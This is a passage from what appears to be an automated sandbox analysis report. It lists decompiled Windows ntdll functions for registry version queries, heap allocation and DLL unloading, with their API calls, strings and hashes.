ZwClose.1105(?,?,?,?), ref: 6AC1D139
ZwClose.1105(00000000,?,?,?), ref: 6AC1D14E

Strings

@, xrefs: 6AC1D0A7
Control Panel\Desktop, xrefs: 6AC1CFBB
Control Panel\Desktop\MuiCached, xrefs: 6AC1CFDB
MachinePreferredUILanguages, xrefs: 6AC1D02B
PreferredUILanguages, xrefs: 6AC1D0C3
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 6AC1D072
@, xrefs: 6AC1D010

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitStringUnicode$Close$Open
String ID: @$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 3920864254-2289709611
Opcode ID: ca281bc6898058e37d6e57eccf5f1513de14f6c3bb53b9e0aa822ffba864b861
Instruction ID: 42b7fdc58f17ea2499e66253b5119d2c4d1b8a89d098e765dedd99ef62b26b49
Opcode Fuzzy Hash: ca281bc6898058e37d6e57eccf5f1513de14f6c3bb53b9e0aa822ffba864b861
Instruction Fuzzy Hash: B9515EB190C345AFC311CF19C88094FB7E8FB85754F514A2EF995A7201EB31DE48AB92

Uniqueness

Uniqueness Score: -1.00%

Function 6AB665A0, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 157
nativeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E6AB665A0(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v28;
				signed int _v300;
				intOrPtr _v304;
				signed int _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				void _v324;
				intOrPtr* _v328;
				void _v332;
				int _v336;
				void* _v340;
				char _v344;
				void* _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				void* _v372;
				void* _v388;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t75;
				intOrPtr* _t110;
				void* _t111;
				signed int _t112;
				signed int _t118;
				void* _t132;
				void* _t135;
				intOrPtr* _t137;
				void* _t142;
				signed int _t143;
				signed int _t145;

				_t145 = (_t143 & 0xfffffff8) - 0x15c;
				_v8 =  *0x6ac5d360 ^ _t145;
				_t75 = _a4;
				_t124 = 0;
				_v332 = _t75;
				_t110 = _a12;
				_t137 = _a8;
				_v328 = _t137;
				if(_t75 != 0) {
					_push("true");
					_pop(_t112);
					_v340 = 0;
					_v336 = 0;
					memset( &_v324, 0, _t112 << 2);
					_t145 = _t145 + 0xc;
					_v344 = 0;
					_v348 = 0;
					_t132 = 0;
					RtlInitUnicodeString( &_v340, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion");
					_v332 = 0x18;
					_v324 =  &_v348;
					_v328 = 0;
					_push( &_v332);
					_push(0x20119);
					_v320 = 0x40;
					_push( &_v352);
					_v316 = 0;
					_v312 = 0;
					if(E6ABA9600() >= 0) {
						if(E6AB666D4(_v352, L"UBR",  &_v356) >= 0) {
							_t132 = _v356;
						}
						_push(_v352);
						E6ABA95D0();
					}
					_v308 = 0x11c;
					E6AB94020( &_v308);
					_t89 = _v344;
					asm("adc esi, edx");
					asm("adc esi, 0x0");
					 *_t89 = 0 + _v300 * 0x10000 + _t132;
					 *((intOrPtr*)(_t89 + 4)) = _v308 * 0x10000 + _v304;
					_t124 = 0;
					_t137 = _v340;
				}
				if(_t137 != 0) {
					_v348 = _t124;
					_v344 = _t124;
					_v356 = 3;
					RtlInitUnicodeString( &_v348, L"Kernel-OneCore-DeviceFamilyID");
					_push( &_v344);
					_push(4);
					_push( &_v364);
					_push( &_v348);
					_push( &_v356);
					E6ABAA9B0();
					_t89 =  *((intOrPtr*)(_t145 + 0x10));
					 *_t137 =  *((intOrPtr*)(_t145 + 0x10));
				}
				if(_t110 != 0) {
					_t118 = 6;
					memset( &_v332, 0, _t118 << 2);
					_t145 = _t145 + 0xc;
					_v348 = 0;
					_v344 = 0;
					_v352 = 0;
					_v356 = 0;
					 *_t110 = 0;
					RtlInitUnicodeString( &_v348, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\OEM");
					_v340 = 0x18;
					_v332 =  &_v356;
					_push( &_v340);
					_push(0x20119);
					_v336 = 0;
					_push( &_v360);
					_v328 = 0x40;
					_v324 = 0;
					_v320 = 0;
					if(E6ABA9600() >= 0) {
						_t124 = L"DeviceForm";
						if(E6AB666D4(_v360, L"DeviceForm",  &_v364) >= 0) {
							 *_t110 = _v364;
						}
						_push(_v360);
						_t89 = E6ABA95D0();
					}
				}
				_pop(_t135);
				_pop(_t142);
				_pop(_t111);
				return E6ABAB640(_t89, _t111,  *(_t145 + 0x164) ^ _t145, _t124, _t135, _t142);
			}

0x6ab665a8
0x6ab665b5
0x6ab665bc
0x6ab665bf
0x6ab665c1
0x6ab665c6
0x6ab665ca
0x6ab665cd
0x6ab665d4
0x6abc19a6
0x6abc19a8
0x6abc19ab
0x6abc19b3
0x6abc19b7
0x6abc19b7
0x6abc19c2
0x6abc19c7
0x6abc19cb
0x6abc19cd
0x6abc19d6
0x6abc19de
0x6abc19e8
0x6abc19ec
0x6abc19ed
0x6abc19f6
0x6abc19fe
0x6abc19ff
0x6abc1a03
0x6abc1a0e
0x6abc1a25
0x6abc1a27
0x6abc1a27
0x6abc1a2b
0x6abc1a2f
0x6abc1a2f
0x6abc1a38
0x6abc1a41
0x6abc1a66
0x6abc1a6a
0x6abc1a6e
0x6abc1a71
0x6abc1a73
0x6abc1a76
0x6abc1a78
0x6abc1a78
0x6ab665dc
0x6ab665e7
0x6ab665ec
0x6ab665f0
0x6ab665f8
0x6ab66601
0x6ab66602
0x6ab66608
0x6ab6660d
0x6ab66612
0x6ab66613
0x6ab66618
0x6ab6661c
0x6ab6661c
0x6ab66620
0x6ab6663b
0x6ab66644
0x6ab66644
0x6ab6664f
0x6ab66654
0x6ab66658
0x6ab6665c
0x6ab66660
0x6ab66662
0x6ab6666b
0x6ab66673
0x6ab6667b
0x6ab6667c
0x6ab66685
0x6ab66689
0x6ab6668a
0x6ab66692
0x6ab66696
0x6ab666a1
0x6ab666b0
0x6ab666bc
0x6ab666d0
0x6ab666d0
0x6ab666be
0x6ab666c2
0x6ab666c2
0x6ab666a1
0x6ab66629
0x6ab6662a
0x6ab6662b
0x6ab66636

APIs

RtlInitUnicodeString.1105 ref: 6AB665F8
ZwQueryLicenseValue.1105(?,?,00000003,00000004,?), ref: 6AB66613
RtlInitUnicodeString.1105(?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM), ref: 6AB66662
ZwClose.1105(?,?,?,?,?,?,00020119,00000018), ref: 6AB666C2
ZwOpenKey.1105(?,?,?,?,00020119,00000018), ref: 6AB6669A

Part of subcall function 6ABA9600: LdrInitializeThunk.NTDLL(6AB6ED52,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 6ABA960A

RtlInitUnicodeString.1105(?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6ABC19CD
ZwOpenKey.1105(?,?,?,?,00020119,00000018), ref: 6ABC1A07
ZwClose.1105(?,?,?,?,?,?,00020119,00000018), ref: 6ABC1A2F
RtlGetVersion.1105(?,?,?,?,?,00020119,00000018), ref: 6ABC1A41

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM, xrefs: 6AB66646
@, xrefs: 6ABC19F6
Kernel-OneCore-DeviceFamilyID, xrefs: 6AB665DE
DeviceForm, xrefs: 6AB666B0
UBR, xrefs: 6ABC1A19
@, xrefs: 6AB6668A
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion, xrefs: 6ABC19B9

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitStringUnicode$CloseOpen$InitializeLicenseQueryThunkValueVersion
String ID: @$@$DeviceForm$Kernel-OneCore-DeviceFamilyID$UBR$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM
API String ID: 2689724482-2811273990
Opcode ID: 937dabd8cdf2975e8bc8d557b24a3eaa0169bc892b3a2adf4297cad2b3249718
Instruction ID: 2275fc6dd1c87234874245ab806e22db430d446894503cc0dd8a8d622f8cad77
Opcode Fuzzy Hash: 937dabd8cdf2975e8bc8d557b24a3eaa0169bc892b3a2adf4297cad2b3249718
Instruction Fuzzy Hash: EB5128B15083959FC314CF18D840A8FBBE8FFC8754F41492EFA9897251EB31DA099B92

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8A229, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 183
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6AB8A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E6AB8DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E6ABA9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E6AC2A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E6ABA9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E6AB6B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E6AB87D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E6AC2138A(_t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E6AB87D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E6AB87D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E6AC21582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E6AB87D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E6AB87D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E6AC21582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E6ABBD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x6ab8a229
0x6ab8a231
0x6ab8a23f
0x6ab8a242
0x6ab8a244
0x6ab8a24c
0x6ab8a255
0x6ab8a25a
0x6ab8a25f
0x6abd1c76
0x6abd1c78
0x6abd1c7e
0x6abd1c7f
0x6abd1c81
0x6abd1c82
0x6abd1c84
0x6abd1c89
0x6abd1c8b
0x6abd1c9e
0x6abd1c9e
0x6abd1cab
0x6abd1cb2
0x00000000
0x6abd1cb2
0x6abd1c8d
0x6abd1c92
0x00000000
0x00000000
0x6abd1c94
0x6abd1c98
0x00000000
0x00000000
0x00000000
0x6abd1c98
0x6ab8a265
0x6ab8a265
0x6ab8a266
0x6ab8a26f
0x6ab8a270
0x6ab8a276
0x6ab8a277
0x6ab8a279
0x6ab8a27e
0x6ab8a282
0x6abd1db5
0x6abd1dbb
0x6abd1dc1
0x6abd1dc5
0x6abd1de4
0x6abd1de9
0x6abd1dc7
0x6abd1ddc
0x6abd1de1
0x6abd1def
0x6abd1df3
0x6abd1df7
0x6abd1dfe
0x6abd1e06
0x6ab8a302
0x6ab8a308
0x6ab8a308
0x6ab8a288
0x6ab8a28d
0x6ab8a294
0x6abd1cc1
0x6ab8a29a
0x6ab8a29a
0x6ab8a29a
0x6ab8a29f
0x6abd1ccb
0x6abd1cd1
0x6abd1cd8
0x6abd1cea
0x6abd1cea
0x6abd1cd8
0x6ab8a2a9
0x6ab8a2af
0x6ab8a2bc
0x6abd1cfd
0x6ab8a2c2
0x6ab8a2c2
0x6ab8a2c2
0x6ab8a2c7
0x6abd1d07
0x6abd1d0d
0x6abd1d14
0x6abd1d1f
0x6abd1d21
0x6abd1d2c
0x6abd1d2c
0x6abd1d2c
0x6abd1d47
0x6abd1d47
0x6abd1d14
0x6ab8a2cd
0x6ab8a2d2
0x6ab8a2d9
0x6abd1d5a
0x6ab8a2df
0x6ab8a2df
0x6ab8a2df
0x6ab8a2e4
0x6abd1d69
0x6abd1d6b
0x6abd1d76
0x6abd1d76
0x6abd1d76
0x6abd1d91
0x6abd1d91
0x6ab8a2ea
0x6ab8a2f0
0x6ab8a2f5
0x6abd1da8
0x6abd1dad
0x6abd1dad
0x6ab8a2fd
0x6ab8a300
0x00000000

APIs

ZwAllocateVirtualMemory.1105(000000FF,00000014,00000000,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6AB8A279

Part of subcall function 6ABA9660: LdrInitializeThunk.NTDLL(6ABF18BF,000000FF,00000000,00000000,0000000C,00001000,00000004,6AC40810,0000001C,6ABF1616), ref: 6ABA966A

RtlGetCurrentServiceSessionId.1105(000000FF,00000014,00000000,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6AB8A288
RtlGetCurrentServiceSessionId.1105 ref: 6AB8A2B5
RtlGetCurrentServiceSessionId.1105 ref: 6AB8A2CD
ZwQueryVirtualMemory.1105(000000FF,?,00000003,00000014,00000014,00000000,?,?,?,-00000018,?,?,?,?,6AC24C8F), ref: 6ABD1C84
DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6ABD1DDC
DbgPrint.1105(ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix),00000000,?,?,?), ref: 6ABD1DFE

Strings

`, xrefs: 6ABD1C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 6ABD1DF9
HEAP[%wZ]: , xrefs: 6ABD1DD7
HEAP: , xrefs: 6ABD1DE4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession$MemoryPrintVirtual$AllocateInitializeQueryThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 1108326835-2586055223
Opcode ID: 2d60bf13bbbb66c55a932a9d53133e151e9a7a40a68b2b78885224b054096625
Instruction ID: 8b0977a2be264477b20c5bad2bdc68b288a5425d8d5a7ffc3ad9cc5d14a28063
Opcode Fuzzy Hash: 2d60bf13bbbb66c55a932a9d53133e151e9a7a40a68b2b78885224b054096625
Instruction Fuzzy Hash: 935105B12456C0AFD321DF6CD848F2B77E8FB80718F0A0568F5608B2A2DF25D840EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6F51D, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185
librarymemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6AB6F51D(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				void* _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t54;
				intOrPtr _t63;
				intOrPtr _t76;
				signed int _t77;
				signed int _t86;
				void* _t88;
				signed int _t89;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t95;
				signed int _t101;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;
				void* _t110;
				intOrPtr* _t111;
				void* _t112;
				void* _t113;
				intOrPtr* _t115;
				void* _t116;
				signed int _t117;
				signed int _t118;
				signed int _t120;

				_t106 = __edx;
				_t93 = __ecx;
				_t120 = (_t118 & 0xfffffff8) - 0x14;
				_v8 =  *0x6ac5d360 ^ _t120;
				_t115 = __ecx;
				_v24 =  *[fs:0x30];
				_t88 = 0;
				_v16 = __ecx;
				_push(_t108);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L3:
					 *(_t115 + 0x20) =  *(_t115 + 0x20) | 0xffffffff;
					E6AB70225(_t88, _t93, _t108, _t115,  *(_t115 + 0x20));
					L4:
					if( *0x6ac58472 != _t88) {
						_t106 =  *0x7ffe0330;
						_t89 =  *0x6ac5b210; // 0x0
						_t94 = 0x20;
						_t93 = _t94 - (_t106 & 0x0000001f);
						asm("ror ebx, cl");
						_t88 = _t89 ^ _t106;
					}
					L6AB7EEF0(0x6ac552d8);
					_t54 =  *_t115;
					while(1) {
						_v20 = _t54;
						if(_t54 == _t115) {
							break;
						}
						_t22 = _t54 - 0x54; // -84
						_t109 = _t22;
						__eflags =  *(_t109 + 0x34) & 0x00000008;
						if(( *(_t109 + 0x34) & 0x00000008) != 0) {
							_push(_t93);
							_t106 = 2;
							E6AB78B80(_t109, _t106);
							__eflags = _t88;
							if(_t88 != 0) {
								 *0x6ac5b1e0(_t109);
								 *_t88();
							}
							_t93 = _t109;
							E6AB78800(_t93, 1);
							_t63 = _v32;
							__eflags =  *(_t63 + 0x68) & 0x00000100;
							if(( *(_t63 + 0x68) & 0x00000100) != 0) {
								_t93 = _t109;
								E6ABEEA20(_t93);
							}
						}
						__eflags =  *0x6ac55780 & 0x00000005;
						if(__eflags != 0) {
							_t46 = _t109 + 0x24; // -48
							E6ABE5510("minkernel\\ntdll\\ldrsnap.c", 0xc5e, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t46);
							_t120 = _t120 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t109 + 0x18)));
						E6AB70100(_t88, _t93, _t109, _t115, __eflags);
						_t54 =  *_v28;
					}
					_t65 = E6AB7EB70(_t93, 0x6ac552d8);
					while(1) {
						L8:
						_t95 =  *(_t115 + 0x18);
						if(_t95 == 0) {
							break;
						}
						_t110 =  *_t95;
						__eflags = _t110 - _t95;
						if(_t110 != _t95) {
							_t65 =  *_t110;
							 *_t95 =  *_t110;
						} else {
							_t34 = _t115 + 0x18;
							 *_t34 =  *(_t115 + 0x18) & 0x00000000;
							__eflags =  *_t34;
						}
						__eflags = _t110;
						if(_t110 == 0) {
							break;
						} else {
							E6AB82280(_t65, 0x6ac584d8);
							_t92 =  *((intOrPtr*)(_t110 + 4));
							_t37 = _t110 + 8; // -76
							_t107 = _t37;
							_t101 =  *(_t92 + 0x1c);
							_t76 =  *_t101;
							_v28 = _t76;
							__eflags = _t76 - _t107;
							if(_t76 != _t107) {
								_t117 = _v24;
								do {
									_t77 =  *_t117;
									_t101 = _t117;
									_t117 = _t77;
									__eflags = _t77 - _t107;
								} while (_t77 != _t107);
								_t115 = _v16;
							}
							 *_t101 =  *_t107;
							__eflags =  *(_t92 + 0x1c) - _t107;
							if(__eflags == 0) {
								asm("sbb eax, eax");
								_t86 =  ~(_t101 - _t107) & _t101;
								__eflags = _t86;
								 *(_t92 + 0x1c) = _t86;
							}
							_t106 = 0;
							_push( &_v12);
							E6AB7093F(_t92, _t92, 0, _t110, _t115, __eflags);
							E6AB7FFB0(_t92, _t110, 0x6ac584d8);
							__eflags = _v20;
							if(_v20 != 0) {
								E6AB6F51D(_t92, 0);
							}
							_t65 = RtlFreeHeap( *0x6ac57b98, 0, _t110);
							continue;
						}
					}
					_t111 =  *_t115;
					 *(_t115 + 0x20) = 0xfffffffe;
					if(_t111 == _t115) {
						L14:
						_pop(_t112);
						_pop(_t116);
						_pop(_t90);
						return E6ABAB640(_t65, _t90, _v8 ^ _t120, _t106, _t112, _t116);
					} else {
						goto L10;
					}
					do {
						L10:
						_t91 =  *_t111;
						_t113 = _t111 + 0xffffffac;
						 *(_t113 + 0x34) =  *(_t113 + 0x34) | 0x00000002;
						E6AB82280(_t65, 0x6ac584d8);
						E6AB7008A(_t113, _t115);
						if(( *(_t113 + 0x34) & 0x00000080) != 0) {
							_t17 = _t113 + 0x74; // -140
							L6AB6F900(0x6ac585fc, _t17);
							_t18 = _t113 + 0x68; // -152
							L6AB6F900(0x6ac585f4, _t18);
							 *(_t113 + 0x20) =  *(_t113 + 0x20) & 0x00000000;
						}
						E6AB7FFB0(_t91, _t113, 0x6ac584d8);
						if( *0x6ac57b94 != 0) {
							E6ABA0413(_t113);
						}
						_t65 = E6AB7EC7F(_t113);
						_t111 = _t91;
					} while (_t91 != _t115);
					goto L14;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L4;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) != 9) {
					goto L8;
				}
				goto L3;
			}

0x6ab6f51d
0x6ab6f51d
0x6ab6f525
0x6ab6f52f
0x6ab6f53b
0x6ab6f53d
0x6ab6f541
0x6ab6f543
0x6ab6f547
0x6ab6f54c
0x6ab6f55a
0x6ab6f55a
0x6ab6f55e
0x6ab6f563
0x6ab6f569
0x6ab6f718
0x6ab6f720
0x6ab6f72b
0x6ab6f72c
0x6ab6f72e
0x6ab6f730
0x6ab6f730
0x6ab6f574
0x6ab6f579
0x6ab6f57b
0x6ab6f57b
0x6ab6f581
0x00000000
0x00000000
0x6ab6f61f
0x6ab6f61f
0x6ab6f622
0x6ab6f626
0x6ab6f628
0x6ab6f62b
0x6ab6f62e
0x6ab6f633
0x6ab6f635
0x6ab6f73a
0x6ab6f740
0x6ab6f740
0x6ab6f63d
0x6ab6f63f
0x6ab6f644
0x6ab6f648
0x6ab6f64f
0x6abc5d11
0x6abc5d13
0x6abc5d13
0x6ab6f64f
0x6ab6f655
0x6ab6f65c
0x6abc5d1d
0x6abc5d37
0x6abc5d3c
0x6abc5d3c
0x6ab6f662
0x6ab6f664
0x6ab6f667
0x6ab6f670
0x6ab6f670
0x6ab6f58c
0x6ab6f591
0x6ab6f591
0x6ab6f591
0x6ab6f596
0x00000000
0x00000000
0x6ab6f677
0x6ab6f679
0x6ab6f67b
0x6ab6f706
0x6ab6f708
0x6ab6f681
0x6ab6f681
0x6ab6f681
0x6ab6f681
0x6ab6f681
0x6ab6f685
0x6ab6f687
0x00000000
0x6ab6f68d
0x6ab6f692
0x6ab6f697
0x6ab6f69a
0x6ab6f69a
0x6ab6f69d
0x6ab6f6a0
0x6ab6f6a2
0x6ab6f6a6
0x6ab6f6a8
0x6ab6f6f2
0x6ab6f6f6
0x6ab6f6f6
0x6ab6f6f8
0x6ab6f6fa
0x6ab6f6fc
0x6ab6f6fc
0x6ab6f700
0x6ab6f700
0x6ab6f6ac
0x6ab6f6ae
0x6ab6f6b1
0x6ab6f6b9
0x6ab6f6bb
0x6ab6f6bb
0x6ab6f6bd
0x6ab6f6bd
0x6ab6f6c4
0x6ab6f6c6
0x6ab6f6c9
0x6ab6f6d3
0x6ab6f6d8
0x6ab6f6dd
0x6ab6f711
0x6ab6f711
0x6ab6f6e8
0x00000000
0x6ab6f6e8
0x6ab6f687
0x6ab6f59c
0x6ab6f59e
0x6ab6f5a7
0x6ab6f60d
0x6ab6f611
0x6ab6f612
0x6ab6f613
0x6ab6f61e
0x00000000
0x00000000
0x00000000
0x6ab6f5a9
0x6ab6f5a9
0x6ab6f5a9
0x6ab6f5ab
0x6ab6f5b3
0x6ab6f5b7
0x6ab6f5be
0x6ab6f5c7
0x6ab6f5c9
0x6ab6f5d2
0x6ab6f5d7
0x6ab6f5e0
0x6ab6f5e5
0x6ab6f5e5
0x6ab6f5ee
0x6ab6f5fa
0x6abc5d46
0x6abc5d46
0x6ab6f602
0x6ab6f607
0x6ab6f609
0x00000000
0x6ab6f5a9
0x6ab6f552
0x00000000
0x00000000
0x6ab6f558
0x00000000
0x00000000
0x00000000

APIs

RtlEnterCriticalSection.1105(6AC552D8), ref: 6AB6F574
RtlLeaveCriticalSection.1105(6AC552D8,?,00000000,6AC552D8), ref: 6AB6F58C
RtlAcquireSRWLockExclusive.1105 ref: 6AB6F5B7
RtlRbRemoveNode.1105(6AC585FC,-0000008C), ref: 6AB6F5D2
RtlRbRemoveNode.1105(6AC585F4,-00000098,6AC585FC,-0000008C), ref: 6AB6F5E0
RtlReleaseSRWLockExclusive.1105(6AC584D8), ref: 6AB6F5EE
LdrUnloadAlternateResourceModuleEx.1105(?,00000000,6AC552D8), ref: 6AB6F667
RtlAcquireSRWLockExclusive.1105(6AC584D8,6AC552D8,?,00000000,6AC552D8), ref: 6AB6F692
RtlReleaseSRWLockExclusive.1105(6AC584D8,?,6AC584D8,6AC552D8,?,00000000,6AC552D8), ref: 6AB6F6D3
RtlFreeHeap.1105(00000000,-00000054,6AC584D8,?,6AC584D8,6AC552D8), ref: 6AB6F6E8
RtlDebugPrintTimes.1105(-00000054,?,6AC552D8), ref: 6AB6F73A

Strings

LdrpUnloadNode, xrefs: 6ABC5D28
Unmapping DLL "%wZ", xrefs: 6ABC5D21
minkernel\ntdll\ldrsnap.c, xrefs: 6ABC5D32

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

